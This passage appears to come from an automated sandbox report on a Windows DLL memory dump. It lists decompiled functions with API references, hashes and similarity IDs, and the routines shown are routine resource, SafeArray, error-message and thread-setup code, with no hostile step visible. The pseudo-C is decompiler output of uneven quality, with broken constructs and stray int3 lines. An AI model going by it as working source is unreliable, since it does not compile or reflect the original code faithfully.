Opcode Fuzzy Hash: 9c1ecd89558127136b30157e12075d58641962e7fdfedea9b734469a27a6331e
Instruction Fuzzy Hash: E121E330100605EFCB15DF70E8D2A5A77E0EF053E0B918529E80A9A296DB30EC91CB80

Uniqueness

Uniqueness Score: -1.00%

Function 10015763, Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10015763(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags, CHAR* _a4) {
				intOrPtr _v8;
				void* _v12;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t28;
				void* _t29;
				void* _t30;
				signed int _t35;
				void* _t44;
				signed short* _t58;
				signed int _t60;
				void* _t65;
				void* _t67;
				struct HINSTANCE__* _t68;
				void* _t70;

				_push(__ecx);
				_push(__ecx);
				_push(_t67);
				_v8 = __ecx;
				_t68 =  *(E1001F108(__ebx, __edi, _t67, __eflags) + 0xc);
				_t28 = FindResourceA(_t68, _a4, 0xf1);
				if(_t28 != 0) {
					_t29 = LoadResource(_t68, _t28);
					_v12 = _t29;
					__eflags = _t29;
					if(_t29 == 0) {
						goto L1;
					} else {
						_t70 = LockResource(_t29);
						__eflags = _t70;
						if(__eflags == 0) {
							goto L1;
						} else {
							_t32 =  *(_t70 + 6) & 0x0000ffff;
							_push(__ebx);
							_push(__edi);
							_t60 = 4;
							_t61 = ( *(_t70 + 6) & 0x0000ffff) * _t60 >> 0x20;
							_t65 = E100092FB(__eflags,  ~(0 | __eflags > 0x00000000) | _t32 * _t60);
							_t35 = 0;
							__eflags = 0 -  *(_t70 + 6);
							if(0 <  *(_t70 + 6)) {
								_t13 = _t70 + 8; // 0x8
								_t58 = _t13;
								do {
									 *(_t65 + _t35 * 4) =  *_t58 & 0x0000ffff;
									_t61 =  *(_t70 + 6) & 0x0000ffff;
									_t35 = _t35 + 1;
									_t58 =  &(_t58[1]);
									__eflags = _t35 - ( *(_t70 + 6) & 0x0000ffff);
								} while (_t35 < ( *(_t70 + 6) & 0x0000ffff));
							}
							_t44 = E10014401(_v8, _t61, _t65,  *(_t70 + 6) & 0x0000ffff);
							E1000932A(_t44, _t65, _t70, __eflags, _t65);
							__eflags = _t44;
							if(_t44 != 0) {
								_t55 =  *(_t70 + 4) & 0x0000ffff;
								E10014AC8(_v8, ( *(_t70 + 2) & 0x0000ffff) + 7, ( *(_t70 + 4) & 0x0000ffff) + 7,  *(_t70 + 2) & 0x0000ffff, _t55);
								_t44 = E10014B7C(_v8, __eflags, _a4);
							}
							FreeResource(_v12);
							_t30 = _t44;
						}
					}
				} else {
					L1:
					_t30 = 0;
				}
				return _t30;
			}

0x10015768
0x10015769
0x1001576a
0x1001576b
0x10015773
0x1001577f
0x10015787
0x10015792
0x10015798
0x1001579b
0x1001579d
0x00000000
0x1001579f
0x100157a6
0x100157a8
0x100157aa
0x00000000
0x100157ac
0x100157ac
0x100157b0
0x100157b1
0x100157b6
0x100157b7
0x100157c7
0x100157cb
0x100157cd
0x100157d1
0x100157d3
0x100157d3
0x100157d6
0x100157d9
0x100157dc
0x100157e0
0x100157e2
0x100157e3
0x100157e3
0x100157d6
0x100157f6
0x100157f8
0x100157fe
0x10015800
0x10015802
0x10015817
0x10015827
0x10015827
0x1001582c
0x10015833
0x10015835
0x100157aa
0x10015789
0x10015789
0x10015789
0x10015789
0x10015838

APIs

FindResourceA.KERNEL32(?,10008152,000000F1), ref: 1001577F
LoadResource.KERNEL32(?,00000000,?,?,?,?,10008152,?,?,?,0000E800,?), ref: 10015792
LockResource.KERNEL32(00000000,?,?,?,?,10008152,?,?,?,0000E800,?), ref: 100157A0
FreeResource.KERNEL32(10008152,00000000,?,?,?,?,?,?,?,10008152,?,?,?,0000E800,?), ref: 1001582C

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 7defc17e8b31dcf263468db5f14109dd0bfa3a9d2851c0558a69dd686384ec50
Instruction ID: 8833aa68665adfafbb0b23c727670ea894565ecf898763ffd5ad11cad813101a
Opcode Fuzzy Hash: 7defc17e8b31dcf263468db5f14109dd0bfa3a9d2851c0558a69dd686384ec50
Instruction Fuzzy Hash: 9721F176500221FBDB18CBA5DC868BBB7F8EF48651705842EF946DB1A0EB31ED80D760

Uniqueness

Uniqueness Score: -1.00%

Function 1002832F, Relevance: 6.1, APIs: 4, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E1002832F(intOrPtr __eax, void* __ebx, short* __ecx, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t25;
				void* _t29;
				signed int _t31;
				signed int _t32;
				signed int _t36;
				signed int _t41;
				signed int _t42;
				short* _t47;
				short* _t48;

				_t38 = __ecx;
				_t25 = __eax;
				_push(__ebx);
				_t36 = _a8;
				_push(_t41);
				_t47 = __ecx;
				if(_t36 == 0 || _a12 == 0) {
					L8:
					E1000A5CD(_t36, _t38, _t41, _t47, __eflags);
					asm("int3");
					_push(_t38);
					_push(_t38);
					_push(_t47);
					_push(_t41);
					_t42 = _v8;
					_t48 = _t38;
					__eflags = _t42;
					if(__eflags <= 0) {
						L10:
						E1000A5CD(_t36, _t38, _t42, _t48, __eflags);
					}
					_v12 = _a12;
					_push( &_v16);
					_push(1);
					_push(_v0);
					_v16 = _t42;
					_t29 = E1002832F( &_v16, _t36, _t38);
					__eflags = _a8;
					if(_a8 != 0) {
						_t38 = _t48;
						_t31 = E10027F70( &_a4, _t48,  &_a4);
						__imp__#18( *((intOrPtr*)(_t48 + 8)));
						_t32 = _t31 * _t42;
						__eflags = _t31 * _t42 >> 0x20;
						if(__eflags > 0) {
							goto L10;
						} else {
							__eflags = _t32 - 0x7fffffff;
							if(__eflags > 0) {
								goto L10;
							} else {
								_t29 = E10027F8B(E10003B00(_t42, _t48, _a4, _t32, _a8, _t32), _t48);
							}
						}
					}
					return _t29;
				} else {
					_t41 = _a4;
					if((_t41 & 0x00007000) != 0 || _t41 == 0 || _t41 == 1) {
						goto L8;
					} else {
						__imp__#9(__ecx);
						__imp__#15(_t41, _t36, _a12);
						 *((intOrPtr*)(__ecx + 8)) = __eax;
						_t60 = __eax;
						if(__eax == 0) {
							_t25 = E1000A595(_t36, __ecx, _t41, __ecx, _t60);
						}
						 *_t47 = _t41 | 0x00002000;
						 *((intOrPtr*)(_t47 + 0x14)) = _t36;
						__imp__#18(_t25);
						 *((intOrPtr*)(_t47 + 0x10)) = _t25;
						return _t25;
					}
				}
			}

0x1002832f
0x1002832f
0x10028334
0x10028335
0x10028339
0x1002833a
0x1002833e
0x10028397
0x10028397
0x1002839c
0x100283a2
0x100283a3
0x100283a4
0x100283a5
0x100283a6
0x100283a9
0x100283ab
0x100283ad
0x100283af
0x100283af
0x100283af
0x100283b7
0x100283bd
0x100283be
0x100283c0
0x100283c3
0x100283c6
0x100283cb
0x100283cf
0x100283d5
0x100283d7
0x100283df
0x100283e5
0x100283e7
0x100283e9
0x00000000
0x100283eb
0x100283eb
0x100283f0
0x00000000
0x100283f2
0x10028404
0x10028404
0x100283f0
0x100283e9
0x1002840c
0x10028346
0x10028346
0x1002834f
0x00000000
0x1002835c
0x1002835d
0x10028368
0x1002836e
0x10028371
0x10028373
0x10028375
0x10028375
0x10028381
0x10028384
0x10028387
0x1002838e
0x10028394
0x10028394
0x1002834f

APIs

VariantClear.OLEAUT32(?), ref: 1002835D
SafeArrayCreate.OLEAUT32(10003395,?,00000000), ref: 10028368
SafeArrayGetElemsize.OLEAUT32(00000000), ref: 10028387

Part of subcall function 1000A595: __CxxThrowException@8.LIBCMT ref: 1000A5AB

SafeArrayGetElemsize.OLEAUT32(?), ref: 100283DF

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$Elemsize$ClearCreateException@8ThrowVariant
String ID:
API String ID: 430961931-0
Opcode ID: a2271b85577131c20abad677c3b01d8aa2e77f628b3d5f69dded7358d99f6a15
Instruction ID: af845eb2b4642c7f67ce9ef9ba78370893535bcf796c7528f1697a95731f41f3
Opcode Fuzzy Hash: a2271b85577131c20abad677c3b01d8aa2e77f628b3d5f69dded7358d99f6a15
Instruction Fuzzy Hash: 0E21E57A500209AFEB11DF55EC40A9FBBEDEF84BA0F41452AF91583150D7B1EB40C761

Uniqueness

Uniqueness Score: -1.00%

Function 1002EECB, Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E1002EECB(signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _t15;
				signed int _t17;
				void* _t18;
				void* _t19;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t15;
				}
				_t23 = _a4;
				if((_t23 & 0x00002000) == 0) {
					_t17 = (_t23 & 0x0000ffff) - 8;
					if(_t17 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t17;
					}
					_t18 = _t17 - 1;
					if(_t18 == 0) {
						L13:
						_t17 =  *_t31;
						if(_t17 == 0) {
							goto L17;
						}
						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
						goto L16;
					}
					_t17 = _t18 - 3;
					if(_t17 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t19 = _t17 - 1;
					if(_t19 == 0) {
						goto L13;
					} else {
						_t17 = _t19 - 0x7b;
						if(_t17 == 0) {
							E1002EE56( &_a8, _a12);
							_t17 = _a8;
							if(_t17 != 0) {
								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
								_t17 = _a8;
								if(_t17 != 0) {
									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
								}
							}
						}
						goto L17;
					}
				}
				_t17 =  *_t31;
				if(_t17 == 0) {
					goto L17;
				} else {
					__imp__#16(_t17);
					goto L16;
				}
			}

0x1002eed1
0x1002eed6
0x1002ef7c
0x1002ef7c
0x1002eedd
0x1002eee6
0x1002eefa
0x1002eefd
0x1002ef53
0x1002ef59
0x1002ef59
0x1002ef5c
0x1002ef62
0x1002ef73
0x1002ef73
0x00000000
0x1002ef79
0x1002eeff
0x1002ef00
0x1002ef43
0x1002ef43
0x1002ef47
0x00000000
0x00000000
0x1002ef4c
0x00000000
0x1002ef4c
0x1002ef02
0x1002ef05
0x1002ef3b
0x00000000
0x1002ef3b
0x1002ef07
0x1002ef08
0x00000000
0x1002ef0a
0x1002ef0a
0x1002ef0d
0x1002ef15
0x1002ef1a
0x1002ef1f
0x1002ef28
0x1002ef2b
0x1002ef30
0x1002ef35
0x1002ef35
0x1002ef30
0x1002ef1f
0x00000000
0x1002ef0d
0x1002ef08
0x1002eee8
0x1002eeec
0x00000000
0x1002eeee
0x1002eeef
0x00000000
0x1002eeef

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 1002EEEF
CoTaskMemFree.OLE32(00000002,?,1002F049,?,00000002,?,00000000,?,?,?,?,1002F2D8,?,?,?,10030473), ref: 1002EF73

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: c7be906b84f4857869654b7fd0b084e8bc4366167038a7857ae67e1fe1ce2823
Instruction ID: b02b14c839021fe5f91e53fbde6562525b2330cfd47bb13d5debc1e693f08146
Opcode Fuzzy Hash: c7be906b84f4857869654b7fd0b084e8bc4366167038a7857ae67e1fe1ce2823
Instruction Fuzzy Hash: 0D117F301802869BEF94CF65EE88B967BE8EF14391BD14038F95ACB150CB35ED00CA50

Uniqueness

Uniqueness Score: -1.00%

Function 10016323, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10016323(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t24;
				void* _t29;
				void* _t31;
				struct HINSTANCE__* _t33;
				signed int _t35;
				signed int _t36;
				void* _t38;
				signed int* _t41;

				_push(__ecx);
				_push(_t29);
				_t38 = __ecx;
				_t43 =  *((intOrPtr*)(__ecx + 0x58));
				_t41 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t33 =  *(E1001F108(_t29, __ecx, _t41, _t43) + 0xc);
					_v8 = LoadResource(_t33, FindResourceA(_t33,  *(_t38 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t41 = LockResource(_v8);
				}
				_t31 = 1;
				if(_t41 != 0) {
					_t36 =  *_t41;
					if(_t41[0] != 0xffff) {
						_t24 = _t41[2] & 0x0000ffff;
						_t35 = _t41[3] & 0x0000ffff;
					} else {
						_t36 = _t41[3];
						_t24 = _t41[4] & 0x0000ffff;
						_t35 = _t41[5] & 0x0000ffff;
					}
					if((_t36 & 0x00001801) != 0 || _t24 != 0 || _t35 != 0) {
						_t31 = 0;
					}
				}
				if( *(_t38 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t31;
			}

0x10016328
0x10016329
0x1001632c
0x1001632e
0x10016335
0x10016338
0x1001633b
0x10016342
0x10016359
0x10016359
0x10016360
0x1001636b
0x1001636b
0x1001636f
0x10016372
0x10016374
0x1001637f
0x1001638e
0x10016392
0x10016381
0x10016381
0x10016384
0x10016388
0x10016388
0x1001639c
0x100163a8
0x100163a8
0x1001639c
0x100163ae
0x100163b3
0x100163b3
0x100163bf

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001634B
LoadResource.KERNEL32(?,00000000), ref: 10016353
LockResource.KERNEL32(00000000), ref: 10016365
FreeResource.KERNEL32(00000000), ref: 100163B3

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 7f77b98ce0d1090b3ed554c45b387dcfa6c779f4e2c833f88338aef85b805e76
Instruction ID: 5039884eeb16698e9c68291c167e1cd7bd23b1e11c2aefdc5b7552de30151791
Opcode Fuzzy Hash: 7f77b98ce0d1090b3ed554c45b387dcfa6c779f4e2c833f88338aef85b805e76
Instruction Fuzzy Hash: BF119D35500721EBDB10CFA1CC88AAAB7F4FF08359F118129E89297550E770EF84E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000BD30, Relevance: 6.1, APIs: 4, Instructions: 59
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000BD30(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t44;

				_t44 = __eflags;
				_t31 = __ebx;
				_push(4);
				E10041CAB(0x10052000, __ebx, __edi, __esi);
				_t35 = E100092FB(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E1000BD18(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E10041FAC( &_a4, 0x10065134);
				asm("int3");
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E1000A618(_t36, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

0x1000bd30
0x1000bd30
0x1000bd30
0x1000bd37
0x1000bd44
0x1000bd46
0x1000bd49
0x1000bd4b
0x1000bd50
0x1000bd52
0x1000bd52
0x1000bd57
0x1000bd5a
0x1000bd5e
0x1000bd61
0x1000bd6d
0x1000bd72
0x1000bd78
0x1000bd7b
0x1000bd80
0x1000bd82
0x1000bd82
0x1000bda0
0x1000bdb6
0x1000bdc1
0x1000bdc9
0x1000bdc9
0x1000bda2
0x1000bda5
0x1000bda7
0x1000bda7
0x1000bdcc

APIs

__EH_prolog3.LIBCMT ref: 1000BD37

Part of subcall function 100092FB: _malloc.LIBCMT ref: 10009319

__CxxThrowException@8.LIBCMT ref: 1000BD6D
FormatMessageA.KERNEL32(00001100,00000000,8007000E,00000800,?,00000000,00000000,?,?,8007000E,10065134,00000004,1000101C,8007000E), ref: 1000BD98

Part of subcall function 1000A618: __cftof.LIBCMT ref: 1000A629

LocalFree.KERNEL32(?), ref: 1000BDC1

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
String ID:
API String ID: 1808948168-0
Opcode ID: b063c6f53cd3083e5bb04a28ae1d0392cc8db35e2b9424087fde27d6b03ad60f
Instruction ID: 6e1ce9ade054acbe0517e55521a2b2131582e0f792ebbab597438efaa27037d8
Opcode Fuzzy Hash: b063c6f53cd3083e5bb04a28ae1d0392cc8db35e2b9424087fde27d6b03ad60f
Instruction Fuzzy Hash: EE117075604249AFEF00DFA4CC85EAE7BA9FF08390F20452AF529CB295E7319950CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001A023, Relevance: 6.1, APIs: 4, Instructions: 57
threadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E1001A023(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t44;
				void* _t46;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;

				_t54 = __eflags;
				_t47 = __ecx;
				_t45 = __ebx;
				_push(4);
				E10041CAB(0x10052731, __ebx, __edi, __esi);
				_t52 = __ecx;
				 *((intOrPtr*)(_t53 - 0x10)) = __ecx;
				E10018124(__ebx, __ecx, __edi, __ecx, _t54);
				 *((intOrPtr*)(_t53 - 4)) = 0;
				 *_t52 = 0x1005924c;
				_t55 =  *((intOrPtr*)(_t53 + 8));
				if( *((intOrPtr*)(_t53 + 8)) == 0) {
					 *((intOrPtr*)(_t52 + 0x50)) = 0;
				} else {
					_t44 = E10042B13( *((intOrPtr*)(_t53 + 8)));
					_pop(_t47);
					 *((intOrPtr*)(_t52 + 0x50)) = _t44;
				}
				_t46 = E1001F108(_t45, 0, _t52, _t55);
				_t56 = _t46;
				if(_t46 == 0) {
					L4:
					E1000A5CD(_t46, _t47, 0, _t52, _t56);
				}
				_t7 = _t46 + 0x74; // 0x74
				_t47 = _t7;
				_t37 = E10018199(_t46, _t7, 0, _t52, _t56);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t52;
				 *((intOrPtr*)(_t52 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t52 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t46 + 4)) = _t52;
				 *((short*)(_t52 + 0x92)) = 0;
				 *((short*)(_t52 + 0x90)) = 0;
				 *((intOrPtr*)(_t52 + 0x44)) = 0;
				 *((intOrPtr*)(_t52 + 0x7c)) = 0;
				 *((intOrPtr*)(_t52 + 0x64)) = 0;
				 *((intOrPtr*)(_t52 + 0x68)) = 0;
				 *((intOrPtr*)(_t52 + 0x54)) = 0;
				 *((intOrPtr*)(_t52 + 0x60)) = 0;
				 *((intOrPtr*)(_t52 + 0x88)) = 0;
				 *((intOrPtr*)(_t52 + 0x58)) = 0;
				 *((intOrPtr*)(_t52 + 0x48)) = 0;
				 *((intOrPtr*)(_t52 + 0x8c)) = 0;
				 *((intOrPtr*)(_t52 + 0x80)) = 0;
				 *((intOrPtr*)(_t52 + 0x84)) = 0;
				 *((intOrPtr*)(_t52 + 0x70)) = 0;
				 *((intOrPtr*)(_t52 + 0x74)) = 0;
				 *((intOrPtr*)(_t52 + 0x94)) = 0;
				 *((intOrPtr*)(_t52 + 0x9c)) = 0;
				 *((intOrPtr*)(_t52 + 0x5c)) = 0;
				 *((intOrPtr*)(_t52 + 0x6c)) = 0;
				 *((intOrPtr*)(_t52 + 0x98)) = 0x200;
				return E10041D83(_t52);
			}

0x1001a023
0x1001a023
0x1001a023
0x1001a023
0x1001a02a
0x1001a02f
0x1001a031
0x1001a034
0x1001a03b
0x1001a03e
0x1001a044
0x1001a047
0x1001a057
0x1001a049
0x1001a04c
0x1001a051
0x1001a052
0x1001a052
0x1001a05f
0x1001a061
0x1001a063
0x1001a065
0x1001a065
0x1001a065
0x1001a06a
0x1001a06a
0x1001a06d
0x1001a074
0x00000000
0x00000000
0x1001a076
0x1001a07f
0x1001a088
0x1001a08b
0x1001a090
0x1001a097
0x1001a09e
0x1001a0a1
0x1001a0a4
0x1001a0a7
0x1001a0aa
0x1001a0ad
0x1001a0b0
0x1001a0b6
0x1001a0b9
0x1001a0bc
0x1001a0c2
0x1001a0c8
0x1001a0ce
0x1001a0d1
0x1001a0d4
0x1001a0da
0x1001a0e0
0x1001a0e3
0x1001a0e6
0x1001a0f7

APIs

__EH_prolog3.LIBCMT ref: 1001A02A

Part of subcall function 10018124: __EH_prolog3.LIBCMT ref: 1001812B

__strdup.LIBCMT ref: 1001A04C
GetCurrentThread.KERNEL32 ref: 1001A079
GetCurrentThreadId.KERNEL32 ref: 1001A082

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: f09862b649dbf66a45155bba8596753edd88eba547c7cf34c19a84a5bb3abf52
Instruction ID: cc67bf64a7db332b3a605bc2ee468fe4ac95b4a3d8c9f7c955fc8c9487182edb
Opcode Fuzzy Hash: f09862b649dbf66a45155bba8596753edd88eba547c7cf34c19a84a5bb3abf52
Instruction Fuzzy Hash: B0219FB4900B409ED721DF3A854524AFBF8FFA4740F10891FE5AACB621DBB0A581CF44

Uniqueness

Uniqueness Score: -1.00%

Function 1001BC1B, Relevance: 6.1, APIs: 4, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1001BC1B(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				struct HRSRC__* _t25;
				void* _t28;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t37;
				struct HINSTANCE__* _t39;

				_push(__ecx);
				_t28 = 0;
				_push(_t36);
				_t34 = __ecx;
				_v8 = 0;
				_t40 = _a8;
				if(_a8 == 0) {
					L4:
					_t37 = _a4;
					_a8 = 1;
					if(_t28 != 0) {
						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
						if(_v8 != 0) {
							FreeResource(_v8);
						}
					}
					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
					}
					_t18 = _a8;
					L10:
					return _t18;
				}
				_t39 =  *(E1001F108(0, __ecx, _t36, _t40) + 0xc);
				_t25 = FindResourceA(_t39, _a8, 0xf0);
				if(_t25 == 0) {
					goto L4;
				}
				_t18 = LoadResource(_t39, _t25);
				_v8 = _t18;
				if(_t18 == 0) {
					goto L10;
				}
				_t28 = LockResource(_t18);
				goto L4;
			}

0x1001bc20
0x1001bc22
0x1001bc24
0x1001bc26
0x1001bc28
0x1001bc2b
0x1001bc2e
0x1001bc63
0x1001bc63
0x1001bc66
0x1001bc6f
0x1001bc81
0x1001bc84
0x1001bc89
0x1001bc89
0x1001bc84
0x1001bc93
0x1001bc9d
0x1001bc9d
0x1001bca3
0x1001bca6
0x1001bcaa
0x1001bcaa
0x1001bc35
0x1001bc41
0x1001bc49
0x00000000
0x00000000
0x1001bc4d
0x1001bc53
0x1001bc58
0x00000000
0x00000000
0x1001bc61
0x00000000

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1001BC41
LoadResource.KERNEL32(?,00000000), ref: 1001BC4D
LockResource.KERNEL32(00000000), ref: 1001BC5B
FreeResource.KERNEL32(00000000), ref: 1001BC89

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 8098b5c61e5f5d24bef5e2c4f9e4a8f310132a8421e71cc8c5086908767669e4
Instruction ID: db77bef35e4e884448b86460836dbc43e8bf7b3247d109e2c70c6c7786154132
Opcode Fuzzy Hash: 8098b5c61e5f5d24bef5e2c4f9e4a8f310132a8421e71cc8c5086908767669e4
Instruction Fuzzy Hash: 0E113A75600619EFDB00CFA5C888AAE7BF9EF48360F018069F9059B260DB71DE40CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1001B513, Relevance: 6.1, APIs: 4, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1001B513(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
